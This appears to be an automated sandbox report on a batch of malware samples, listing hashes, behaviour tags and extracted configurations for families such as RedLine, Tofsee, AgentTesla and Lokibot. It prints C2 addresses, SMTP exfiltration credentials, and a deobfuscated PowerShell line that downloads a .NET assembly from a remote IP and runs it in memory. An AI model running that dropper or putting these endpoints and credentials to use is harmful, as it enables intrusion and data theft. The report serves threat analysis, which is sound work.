Resubmissions

21-12-2024 22:57

241221-2xpr2atjar 10

21-12-2024 20:29

241221-y9xfvsyngy 10

General

  • Target

    JaffaCakes118_3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc

  • Size

    973.8MB

  • Sample

    241221-2xpr2atjar

  • MD5

    0523322523fc2607b21cf06ee2c06e2f

  • SHA1

    49924c11f7b22dbb1fec51402214a4b62f0c4da0

  • SHA256

    3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc

  • SHA512

    a6ca6c07ece8ad4f4c832cf40bf35e267bfc56f34d0aa252b2cfdcc75ee7fd2b9aa55b547b849820163ca48bd05c9061c76d80756427950d2e5181ebace1ebae

  • SSDEEP

    25165824:cbjDAJklOVFPCJ4jMrhQVzccWZYSXn4yPPGwnSQuw:cbj8Sl66PhncWZYyWw6w

Malware Config

Extracted

Family

gafgyt

C2

185.28.39.15:839

Extracted

Family

irata

C2

https://iuskmmdm.ml

Extracted

Family

mirai

Botnet

MIRAI

Extracted

Family

purecrypter

C2


Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

andrmonitor

C2

https://anmon.ru/download_checker.html

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

aurora

C2

176.124.220.67:8081

Extracted

Family

rhadamanthys

C2

http://104.161.119.221:8899/live-edge/nft.png

Extracted

Family

socelars

C2

https://hdbywe.s3.us-west-2.amazonaws.com/sadew1013/

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

systembc

C2

95.179.146.128:443

146.70.53.169:443

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url


Extracted

Family

njrat

Version

0.7d

Botnet

Brouteurs

C2

forthewin.ddns.net:13337

Mutex

fc4dbf906d35a96ddea0300f5b82bfb3

Attributes
  • reg_key

    fc4dbf906d35a96ddea0300f5b82bfb3

  • splitter

    Y262SUCZ4UJJ

Extracted

Family

asyncrat

Version

XSSYE 1.0.8

Botnet

Default

C2

open.imgov.cn:8443

Mutex

91e5d29b47a7d36802e6e1151434cd02

Attributes
  • delay

    30

  • install

    false

  • install_file

    1111game.exe

  • install_folder

    %AppData%

aes.plain

bpCqrBXnuuR2vdg7bNQs0mSaGCqSi6CL

Extracted

Family

raccoon

Botnet

d1d6daf7a5018968dea23d67c142f047

C2

http://5.255.103.158/

Attributes
  • user_agent

    x

xor.plain

d1d6daf7a5018968dea23d67c142f047

Extracted

Family

laplas

C2

clipper.guru

Attributes
  • api_key

    f9ff07c5a5e00d26196b3460b72ad41c90dbd24c7405de597560a9a72e3582dd

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.keefort.com.ec
  • Port:
    587
  • Username:
    mojosnk@keefort.com.ec
  • Password:
    icui4cu2@@
  • Email To:
    mojosnkreprt@keefort.com.ec

Extracted

Family

erbium

C2

http://77.73.133.53/cloud/index.php

Extracted

Family

netwire

C2

podzeye2.duckdns.org:4433

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password

  • registry_autorun

    false

  • use_mutex

    false

Extracted

Family

smokeloader

Botnet

pub4

Extracted

Family

gcleaner

C2

45.139.105.171

85.31.46.167

107.182.129.235

171.22.30.106

Attributes
  • url_path

    ....!..../software.php

    ....!..../software.php

Extracted

Family

redline

C2

62.204.41.141:24758

Attributes
  • auth_value

    76a7aa24209b18e5866f6b31583d7851

Extracted

Family

redline

Botnet

Dozkey

C2

91.212.166.17:47242

Attributes
  • auth_value

    c06f8f31502cdaf6d673db7589189fd5

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Extracted

Family

formbook

Version

4.1

Campaign

a20e

Decoy


Extracted

Family

vidar

Version

55.1

Botnet

1636

C2

https://t.me/dghzq

https://t.me/zjsqpz

https://t.me/fqwexzq

Attributes
  • profile_id

    1636

Extracted

Language
ps1
Deobfuscated

# Downloads the dropper payload and base64-decodes it into a byte array; the
# file is served with a .pdf extension but must be a .NET assembly, since it is
# handed to AppDomain.Load below.
[byte[]]$rowg = [system.convert]::frombase64string((new-object net.webclient).downloadstring("http://20.7.14.99/dll/dll_ink.pdf"))
# Loads the decoded assembly in memory (nothing touches disk), resolves the type
# Fiber.Home and its static method VAI, and invokes it with a single string
# argument that is a URL written in reverse.
(((([system.appdomain]::currentdomain).load($rowg)).gettype("Fiber.Home")).getmethod("VAI")).invoke($null, [object[]]"txt.om/ort/gmi/moc.nesnez-igoto//:sptth")

URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    shaqone.shop
  • Port:
    587
  • Username:
    sender@shaqone.shop
  • Password:
    qPV%6P+jrcf3hV8WFP
  • Email To:
    support@shaqone.shop

Extracted

Language
xlm4.0
Source

=CALL("C:\Users\Admin\AppData\Local\Temp\17286809694b9d22325e29af4e74b2083398de0488d9a96644566c468628554d.xll", "xlAutoOpen", "")

Extracted

Family

lokibot

C2

http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

formbook

Campaign

fofg

Decoy


Targets

    • Target

      09fe7735f742e003ace00c9884b1eb6d55c719735a1fcd207ac985ce746b008a.exe

    • Size

      1.0MB

    • MD5

      690a381d9e34389a101cc26042eb01d9

    • SHA1

      20cbdf652baa00adc83670d907b14724445da0f2

    • SHA256

      09fe7735f742e003ace00c9884b1eb6d55c719735a1fcd207ac985ce746b008a

    • SHA512

      4d101dbd26245e9365bc8a92a4feaa122811468643b8dc9ec6bdc2dc0e53469e37bbba0912ba45071c105f01af44e3959985a56309476fdbec8c1933d9c12b52

    • SSDEEP

      24576:7kr1gzNc71ZGytgGTpd0FUDJr3HbZMOBr:Qr+aRn0FUd73

    • NetWire RAT payload

    • Netwire

      Netwire is a RAT whose main functionality is focused on password stealing and keylogging, but it also includes remote control capabilities.

    • Netwire family

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Suspicious use of SetThreadContext

    • Target

      0a08857b3b6b52510c544f54f8b7489038e371a85db858ad3c34c4f7198da819.vbs

    • Size

      195KB

    • MD5

      a4f71409b11c7a677353f1d7b3e0d13a

    • SHA1

      704ec3fdb8f2ee5e39957785f0d03d5268abd5e6

    • SHA256

      0a08857b3b6b52510c544f54f8b7489038e371a85db858ad3c34c4f7198da819

    • SHA512

      0ed1f3d2fff28a0b7977f966b35c65ed3c3c385eecacf5b1feb38c20ecbbb3017b77b4eca584ea342be86e8e3e5baeec2dbdda3de5c85e97658cd9a4892c1a52

    • SSDEEP

      768:r1wsIXCNd5dghna/lS9P0P7SFuumB/bm/:4wCGBC/

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Uses the powershell.exe command.

    • Target

      0a92b6b6c9ccba573ca47718bf608715dbc87ad48afc19bf7004d8eb9bf598d0.exe

    • Size

      930KB

    • MD5

      53f4e52a78bdf6541e3efdaf401ebbd3

    • SHA1

      9c4841f6dc393e0a197aba01e9cb8491999a6150

    • SHA256

      0a92b6b6c9ccba573ca47718bf608715dbc87ad48afc19bf7004d8eb9bf598d0

    • SHA512

      f14c3b7c53df876eae2d1ea6e03d88d419e91ee9926334993d585f470c4a13eaa1326544de95a0ce06d3b2590461b3ef52c988c8d1bde7e56ca6b49081305300

    • SSDEEP

      12288:GMY3QedajfctobEgT4FtM/e2Rw4nZu4LvJ0BPykKu2sN9nuI:GMwdwOobfT4Foe2pLBuhN9n

    • Target

      0b1f6297e8bfa8fc9ff8a7ad85487ff456c0d66ef2d908588cd27345fba5f4e6.exe

    • Size

      1.2MB

    • MD5

      76f35ccb9dc8b2342d34237d041d16de

    • SHA1

      25b50efad77cebcabf2969a97f31db993286d066

    • SHA256

      0b1f6297e8bfa8fc9ff8a7ad85487ff456c0d66ef2d908588cd27345fba5f4e6

    • SHA512

      06c98ccc3cab2175207f9f2ecc410fafc450f318ff53fc70607b346584f0cefc3377d2eadb347a1814629eb2966cc0c818e9be4fe8a3fb84664178159993fc9c

    • SSDEEP

      12288:Z6xsbHodJWWMvNlg+ijLraGFdhJhVTqzEfaH/jVCLzcmI+Sec3IpCT:Z6xsbfWsXylvaEfa7wEb6MT

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    • RedLine payload

    • Redline family

    • Suspicious use of SetThreadContext

    • Target

      0b4ffb13a42cb2432b4e021c18f4b4dd51b669ba0356804ca32dac2de7741caa.exe

    • Size

      2.4MB

    • MD5

      1362efe98b360c63f8901fad9b6542fe

    • SHA1

      7cee9adac7453dcf74e77a6907951916e590e593

    • SHA256

      0b4ffb13a42cb2432b4e021c18f4b4dd51b669ba0356804ca32dac2de7741caa

    • SHA512

      29882782ddd3ccf7f6e26135832da86ea961faefd67ddbce79945ef81f291d49051cd5fddb1cb13e11bf996697be5c542427f6aa8876c417f7ba460b50b3f7e1

    • SSDEEP

      49152:Z2Yz1Y1xuKe6eF5NPw13Q4/Dof7G41kBNqrcygeCDqQ/XJ5txoJbljwjcWKVA5hq:MwWEvzo13Q2D6GmMScecqQcJbWIKDq

    • GCleaner

      GCleaner is a pay-per-install malware loader first discovered in early 2019.

    • Gcleaner family

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      0b9a6ed57e23d874bde98d89d3c50a44b3982570cb8bbf41660fad19d3fbe855.exe

    • Size

      5.4MB

    • MD5

      3a6af02d19a5f472a0357ccb50e5b0a6

    • SHA1

      245b235c383d80ca2ae88681bf12f27bea96b92e

    • SHA256

      0b9a6ed57e23d874bde98d89d3c50a44b3982570cb8bbf41660fad19d3fbe855

    • SHA512

      ac7dde150babc8348b963345ce330ee081978e80c1c80344a240c14cb277ba219a0189b6fbd9353a42869281e00b176021a491fdded3b456f4e9bd8638f5a8e4

    • SSDEEP

      98304:xZc4ddDQkADTo0arkXDiBH9ftXnFmEuM2B4lXzqN346KNadVRvhfPqH:Dbv6UGDohFO/sY1rRJ

    • VMProtect packed file

      Detects executables packed with VMProtect commercial packer.

    • Adds Run key to start application

    • Target

      0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe

    • Size

      349KB

    • MD5

      02a41eb01d841ddffe402fcfbb73bd0e

    • SHA1

      932bdc88df3e0c3d0747ec3a53b9aaaf7365b88b

    • SHA256

      0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca

    • SHA512

      c6f42a2f012e320ffdb435e129bf2ab2b62bcea7af20ac10d60ccb11239ef02324845f4a74d2868a70db2715fe6dc9ff7e7c4a789e1bbdaaf3bbef07166e1773

    • SSDEEP

      6144:FweEwTKu1gRtv6cWGqV/9zYTyOpMKbsAJRv31M0E2Jt:Mv6cxqV/GGOqKoAPv31M0/

    Score
    7/10
    • Executes dropped EXE

    • Target

      0c046f07cd96f008a224dc272c32b52af4611cd1852d38db9737abbe3fcf9e89.exe

    • Size

      229KB

    • MD5

      f8c0a565c50b57b8ebc9c280007312ec

    • SHA1

      e0a90e6d88b92002c7b77dc8298cd1b98f89d99e

    • SHA256

      0c046f07cd96f008a224dc272c32b52af4611cd1852d38db9737abbe3fcf9e89

    • SHA512

      483f609a16c268bfb7626bd6dc7826d8822671342cad1ebdab64115863efe7a75dd13ce6ed31b3c89f691644b2a5d719d43f47994769db2c5753e34bdaedf185

    • SSDEEP

      6144:wf6fRxdLyrc/quEJfylTp45uuo9qcOY7Mnh:wf6fRbGcSuEJfylTp4YuUf

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe

    • Size

      371KB

    • MD5

      341944954703c303537b9d8aa25e5531

    • SHA1

      836351bd41f31d10209d0bdab117186d86071816

    • SHA256

      0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553

    • SHA512

      9fc832dbd848b6fba32e5beca85e7e55e385f677739ce4372d3cd76a3b05d044e1cb4edbae3fda7eadd185803359642fef50ea8691ae488d8d7dce19eca99073

    • SSDEEP

      6144:Ic/RLyHWHs8c5LRMuPpucS5YUhb7jRXBsL36vAiVMaY/6V:Ic/R2HsIMuo5YUNNX4U1VM

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    • RedLine payload

    • Redline family

    • Target

      0d825ad1df7c2ac718991f061800e31c6ae4ac7a35516676ac0dad40b84b6037.exe

    • Size

      229KB

    • MD5

      5ee27318991c7dcdfea2fb99ae8f219b

    • SHA1

      1490d4de2bbdb3379819aa08cfd0f0c7762b3783

    • SHA256

      0d825ad1df7c2ac718991f061800e31c6ae4ac7a35516676ac0dad40b84b6037

    • SHA512

      88cfef8883ed42b841563632ffd7eae1eebfb2d3e1bedda3a6794b37d559bcbaa48de979e7a77011325ea96bd36742673b8f1704bad840a938e4ba829018abb7

    • SSDEEP

      3072:DNPnQxjSky4aM1woJLJVqdj98m6hce5VYytX7RMzshG3ZcOGgSerQiswun:DNPQxGNuLJVYj9hgikXlU3TDSKxu

    • Target

      0db3c21dec09a297e99a07ec1ebd007146adfbcb3c8f0d4a3f88868778c6aef9.exe

    • Size

      317KB

    • MD5

      fe62aba35fd5f1c6ca2c1c8be6c27ed3

    • SHA1

      b1912c42ae6742ee1f85be843ad3f66a45372464

    • SHA256

      0db3c21dec09a297e99a07ec1ebd007146adfbcb3c8f0d4a3f88868778c6aef9

    • SHA512

      2d4fedf8c40f2796539a046277ea7f8b6a514e2cecd0b630e8a3a137254a627c873684d247f9e01b53cda4cd36dfa504e9ef1e3c1ed521f9343d45d41032b92a

    • SSDEEP

      6144:fhu1FLTeIjxfniZ5nr6qBgplf95QfGuYjuK2uPbcRItN:fhuXOAfnErgplf3huNuPb0I

    • GCleaner

      GCleaner is a pay-per-install malware loader first discovered in early 2019.

    • Gcleaner family

    • Target

      0de875f11ee5d69c5b4633e3b878529f08788440f87fb3ab0cde77e698b200e9.exe

    • Size

      350KB

    • MD5

      36fcbb3b37a9ba63f1fa77c22297c6a9

    • SHA1

      96f7e90a7949064e286c5cf6a39e40aea2f21263

    • SHA256

      0de875f11ee5d69c5b4633e3b878529f08788440f87fb3ab0cde77e698b200e9

    • SHA512

      ce25057372e00b915f92fae2b4398af9badcec1b8f4a0a5b532f12050adb1bf2ae0657849a8f54e066fcd14cac00e3a691da5393c6c3aae23083358d3d701c11

    • SSDEEP

      6144:ocLt8AYW3GpW4DW7Q74jOxdiUhtoMgJ51XPKM7MBr:ocR8TP87QIWAUhtoXJnXPKo

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    • RedLine payload

    • Redline family

    • Target

      0e3bb95b7ba92dadc59985e6b0d1a75db091d6ca03f755fca34437398217f877.exe

    • Size

      2.4MB

    • MD5

      7e5e288607447a41931025d1f79760ae

    • SHA1

      4ad9a21318ce3c9150b16d1c7d4acef655eb86bf

    • SHA256

      0e3bb95b7ba92dadc59985e6b0d1a75db091d6ca03f755fca34437398217f877

    • SHA512

      7738b15725bab95d16f949f0dc8cc2e9b9c61936d8b3a54a932fb6dd3f0ab38bc21c8f484395eaaa2686d397e22032f6b681c3920721faa04f5663d20c3da083

    • SSDEEP

      49152:Z20nrOjMNC7wlZ6+3WddBI6crIdYnX5oCmG1YQV0REpLgfNcA5hq:MAOjM4wlQCWfBINsADvV0R2gf1Dq

    • GCleaner

      GCleaner is a pay-per-install malware loader first discovered in early 2019.

    • Gcleaner family

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d.exe

    • Size

      252KB

    • MD5

      130f4b6ad5c42bdb5abb4e45406cef94

    • SHA1

      efc55e5f2520c089bfedcc3cfcb4630f595fb688

    • SHA256

      0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d

    • SHA512

      88fdbe7ef0b3a076ebc872d5dc00fb2fa9ff827420433fc24d886d27fc5b462ba090301be042a9a3c5b31241f82b361afe8d586dd48bd5df393f39d0305d4192

    • SSDEEP

      6144:XCutDb6sMMMMMMMMMMMuMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMg:yObMMMMMMMMMMMuMMMMMMMMMMMMMMMMh

    Score
    3/10
    • Target

      0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe

    • Size

      219KB

    • MD5

      566a30af3032ed8c2718c99a9c0d7289

    • SHA1

      4d08ff905ddfdaf7f39465b9af09b6441e8993d7

    • SHA256

      0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6

    • SHA512

      03aa457d3d68d96cdcb8a2d234fac21466bac359bc10948ac1b79222361e992d456df8ba89c8c4e0ada87da0502857a3586ed232a114db9823f13d60308526b1

    • SSDEEP

      3072:UXWlLKlKMO5qI0Ac7ztrQNZezyzh91Ih3Az9Mo+ATIulLwt:QQLrM937JUNZeeFTEMuoZTIuh

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      10758789ca875d9783a8988e0b0dbfd88f75a6ac0eb544b5b37241492223fdd1.exe

    • Size

      647KB

    • MD5

      92e6f05295ae825d4f3d9982a616b98e

    • SHA1

      eb73f950397f919df73442f66cbd15deee931cea

    • SHA256

      10758789ca875d9783a8988e0b0dbfd88f75a6ac0eb544b5b37241492223fdd1

    • SHA512

      100e49ead6c63aba1470ebad85d969310741cc6d7c8d974551ffa07aa1923dec4f4153d363387328c493198ad98bf7535f2f4e138203daa3849ca28f265a3243

    • SSDEEP

      12288:rYK4r6syCKHtudgQcEfCUkNNvshJGxnLeFnQ:rYK4RNKCcg1knvsh45LeFnQ

    • Formbook

      Formbook is a data-stealing malware family.

    • Formbook family

    • Formbook payload

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Suspicious use of SetThreadContext

    • Target

      11a3fde6fbce94c261cc8785856d132eccd5239e95a9129c2ba404cad58bbd96.exe

    • Size

      307KB

    • MD5

      848cfa950baa476b7127aa42a8f8cb2f

    • SHA1

      60fd5296042413a9cebb3a4952f8efa36d8d31d1

    • SHA256

      11a3fde6fbce94c261cc8785856d132eccd5239e95a9129c2ba404cad58bbd96

    • SHA512

      6bed8b5a08a9bfd6eb88eb4203960e6f71e348ae254877653ece37ad144d0e94d79bee58a3e1a39e0c33d0170e2e4aa1ee269224325799cbe5d8fe0b7e1a4e58

    • SSDEEP

      3072:sXqhLZd18O5PcsUpbfxaBytteEd8mGkhXhSSOxtzIZ9dKfV0DgR84+5sm+t904:ooLZ84csYaBk/hXgSOxtodKuDgRTX

    • Target

      11bb525d06957723f55934f7697eaf4c6e0437e435d3fea9f1f4a16d71cd041c.exe

    • Size

      222KB

    • MD5

      80c18619e17ff0835fd578aed8422e4b

    • SHA1

      d82dd7c61eede169f542f89b2fce22841345c1a1

    • SHA256

      11bb525d06957723f55934f7697eaf4c6e0437e435d3fea9f1f4a16d71cd041c

    • SHA512

      25b0946140fe0de5eda34f67089a6bb39827fdd421853edaca55cfa5cbcd199430c0c85dda90b0e225793c1a70708eb7ec8175fed6176f174becdf522ed22584

    • SSDEEP

      3072:BSnlmJpEgXKnlL0EAhoTwN6+k5P5Ykc7Dh2N/qyGqPBBu5YGLTuUO/BcCp:BSYULyNczcp2F1HsYG/VO/BcC

    • Target

      124dcea053b32060dc96c5b2901df4264837a87ea25e635e0ac76145450d9a69.exe

    • Size

      732KB

    • MD5

      c5e02c378a0ddbc62c4172830947e97d

    • SHA1

      d0ed805d5b40454a091f233d0c1d9b29ec64c515

    • SHA256

      124dcea053b32060dc96c5b2901df4264837a87ea25e635e0ac76145450d9a69

    • SHA512

      97a79a56be88085ab2402e4a7474afa344e1eab45108429f2e80de7860da04a97f04220496602d737b9523c854b9c1c24895329d85eb962101b90c19cced5d79

    • SSDEEP

      12288:oy10PPJaxEOCf5lpLR6AlAaXjxmQpunxdk9dmhbbE8QUuQZ60sSj:kTxpcxdPtbE8Duu60sSj

    • Snake Keylogger

      Keylogger and infostealer first seen in November 2020.

    • Snake Keylogger payload

    • Snakekeylogger family

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      13431e2ee5bc86bdc9b53f47dd2ea61912a00952a3ea8f97ea3842ad7053551c.elf

    • Size

      96KB

    • MD5

      9a44a623c0b3bf86f337244a492bb849

    • SHA1

      14e27701d655f430048e92a429926a5fd8abf362

    • SHA256

      13431e2ee5bc86bdc9b53f47dd2ea61912a00952a3ea8f97ea3842ad7053551c

    • SHA512

      5b2337ffe4a6089621586544bba4fd1809e9b113b05566be1326a7b733571332ecc5241ef9bcaf81cab91a34dfd73318df2987781cfb4c3d78311a21a0bbc321

    • SSDEEP

      1536:7QQfckMzQzgv9OtAC0QptczD3z+FavgfTXvEmL49VqFjtUfkjX:7xH/JFDtczD3m57vEmU9VqFBUfkjX

    Score
    3/10
    • Target

      15387da23f7465d5c4ccd137bc21d15d74c0006c7536b92afed5337cdb3e0315.js

    • Size

      100KB

    • MD5

      ed9d1e4c580a9f92815d0cbf00b47b20

    • SHA1

      ccc8533cc8fd804988c75f9ff827192bb98dab3b

    • SHA256

      15387da23f7465d5c4ccd137bc21d15d74c0006c7536b92afed5337cdb3e0315

    • SHA512

      ae543bb540190d4e799cce94f943526ca60d1b8376413dc8fb66251f567087ffaa8ebaf4e67761c51b098c538e0da937e8b65859f968bc58908b9899fd0b24b4

    • SSDEEP

      3072:9F7D4Y+Jk9olJaXvY96bal9BtNe66WWtUrcZtXGD23VMJFB:9FniHKYIOB

    Score
    8/10
    • Blocklisted process makes network request

    • Target

      15938b5637e639c182992c8fdf65b8db3d461c85f6eac57044f40d2a68955372.exe

    • Size

      229KB

    • MD5

      83fd029a3fbe2efc79f203479a4c21e6

    • SHA1

      4290032c569c5eb64d7ebd4c50ef36f01f08dc27

    • SHA256

      15938b5637e639c182992c8fdf65b8db3d461c85f6eac57044f40d2a68955372

    • SHA512

      feb38390727625b364246e17217501b090d4bec00e131043887a5e7e74e9a4caa9b300fa67ed393504aacb62dd7284a471bd747ca6b2b1057b919e6d284d7c17

    • SSDEEP

      3072:GS6n5Yu86fFYNLLS8sZDRw6Cv5NOCr9YBVBNZ/IxwTGHFMtFiRiU4A:GS6uaYRLS82DKL3OCrEVzZ/IAGlmFtU

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      170dc238d7e8c6f55a0aedddd2d01deb03d62e71d7da5c51f67632d2de3f93a4.exe

    • Size

      1.2MB

    • MD5

      749fd58dcffee43317d573fbec8eaddf

    • SHA1

      08964a5cbccfe8460fdbd126004ffdd6c81a1121

    • SHA256

      170dc238d7e8c6f55a0aedddd2d01deb03d62e71d7da5c51f67632d2de3f93a4

    • SHA512

      357eb5dcdaa4aa2249d8a1937cae7c8d362466d63fcbe8232cdf8c561623ee7470ae9f4601090dffb3b41545a032d63fcaba504a0c3c1bbaba579c1333b3f09f

    • SSDEEP

      24576:XAOcZ9OUVm7BVha9TlEkqIMMvBwA2MNxjFJ7oHeWXL7WY:pC0klEkTMMvZx9+7WY

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in Visual Basic.

    • Agenttesla family

    • Executes dropped EXE

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Accesses Microsoft Outlook profiles

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      17286809694b9d22325e29af4e74b2083398de0488d9a96644566c468628554d.xll

    • Size

      551KB

    • MD5

      8c3611f6e56cb6edf445374ba7b8d6b9

    • SHA1

      15b32a9f730e1828193ed0f0bc09aa150d66916a

    • SHA256

      17286809694b9d22325e29af4e74b2083398de0488d9a96644566c468628554d

    • SHA512

      71954f7e5fb770ea06f97d78fb0510cf2f638f6afc5c0555c62c1b411ccded1a487903a284c0e7921beba0de019995877d7f7f518f39559f72e445e2cb53c89c

    • SSDEEP

      12288:Yn/zjvGHAykHJRLW/4+8bzbBSreM3pqZGDxK:az7GHAzH7jX1GFx

    Score
    10/10
    • Loads dropped DLL

    • Target

      17dadc2b105c925bb5d598789e418a9fdedac3a5a26a05fa4b77c8d82f685bb1.elf

    • Size

      26KB

    • MD5

      1c9847187417b3862a8bb18705951f8d

    • SHA1

      eed2e1e9134b783f8e2cc5b25de151fdcf1d3d7f

    • SHA256

      17dadc2b105c925bb5d598789e418a9fdedac3a5a26a05fa4b77c8d82f685bb1

    • SHA512

      59374fcc66d8d805a13b9b076001600df03049ea87c7f6c0468779352f4475c151048a1797b0842058a0543c52f5dbef57c0da3f6a3fcdf558f8bdfd614f0f81

    • SSDEEP

      768:eMKyhegCCMqf2ExRIIOyF+Hx42gU99k9q3UELuZ:NKy4qf2XmFYaqNLE

    Score
    3/10
    • Target

      190ffc93d1cf8112811d0568736905e6a943cc4787fb569754ed7e15ecd2efd7.apk

    • Size

      25.8MB

    • MD5

      eb89d696dd5f7922b4c49db6585a69a0

    • SHA1

      dc70bebb49ea7e0d85c45b206e4a557891e7e122

    • SHA256

      190ffc93d1cf8112811d0568736905e6a943cc4787fb569754ed7e15ecd2efd7

    • SHA512

      433df9feea2ee58701bf51d4db69925c0471b9361016a8a095a5bc76c2cff06834ad1dd5a1dea6d7e700c75ffea5108c472e6db2870184f69d9812d08b44c8cf

    • SSDEEP

      393216:/q1j7QtsfFZWOHhlFXRdTKosUBU+X8UPNwhgcCgBj8aCyiPJeq39YSpv:iB7Q+fVtGGBNCgeB4aCylM95pv

    Score
    3/10
    • Target

      1a4383821db896055970d1358d5f3591a7b5963f93ffcca737ac94bf6972cce1.vbs

    • Size

      554KB

    • MD5

      a4afe82ecf3940b8363d806604bc37a6

    • SHA1

      8d44d22cbe509b8f5662daf586e8de5446089ec9

    • SHA256

      1a4383821db896055970d1358d5f3591a7b5963f93ffcca737ac94bf6972cce1

    • SHA512

      be1817f80a514d1f7887a7a2b8f6e1364e3c14165effa26c3f12f95bdded410f81781246f36f2e0a7baa70682e513380b2fce5c4541bf9555594011013cf0649

    • SSDEEP

      12288:89OSGK7KzVkqo3CoMndRBwcm4MpPrNbbx9Od/UR1VY:eGKW6nMn7BiPpDZbAMfVY

    Score
    8/10
    • Blocklisted process makes network request

    • Target

      1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe

    • Size

      851KB

    • MD5

      84a4e8581550b0634e38d3218813ac79

    • SHA1

      1005f9154fb27c448ce8e39646b2da1fc010942e

    • SHA256

      1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d

    • SHA512

      0c924c0763f9bec6c7de3f303263436c8c63ff40682966feb04ffa54eb282aabe5d52a8d5dbffd417666f0a7d77d25eb24956a853616dfed24c79c278e9dd5a9

    • SSDEEP

      12288:y4xTxt9ivc50KsBNgK10IJkHKqZrDgSQlOnvgfEunph:3FivcRsBVBJyZX28n2

    • Lokibot

      Lokibot is a password and cryptocoin wallet stealer.

    • Lokibot family

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses Microsoft Outlook profiles

    • Suspicious use of SetThreadContext

    • Target

      1b13d05cae0e4eac18dbaffe04a238238d6c2c2be285d825712cfbef91341326.exe

    • Size

      1.7MB

    • MD5

      f18a8734fe5484be1f784dd47178d6c6

    • SHA1

      abf12814aa5c4fd746e3b5a9635667a2c5ac0604

    • SHA256

      1b13d05cae0e4eac18dbaffe04a238238d6c2c2be285d825712cfbef91341326

    • SHA512

      f56646998a95a74bebd3174565ef01675f8c8ae9124f61598efbcfed60855e924accb4506da2f120bb9c9c59766fdc3de8f3dc79f5577ac0bd17ff9bf0d47f52

    • SSDEEP

      49152:H6VUMI6hKcPoV8bZLL9uj5a/Nxg+i/qA3gv:H688lLcj5Yg7/qegv

    Score
    7/10
    • Loads dropped DLL

    • Blocklisted process makes network request

    • Target

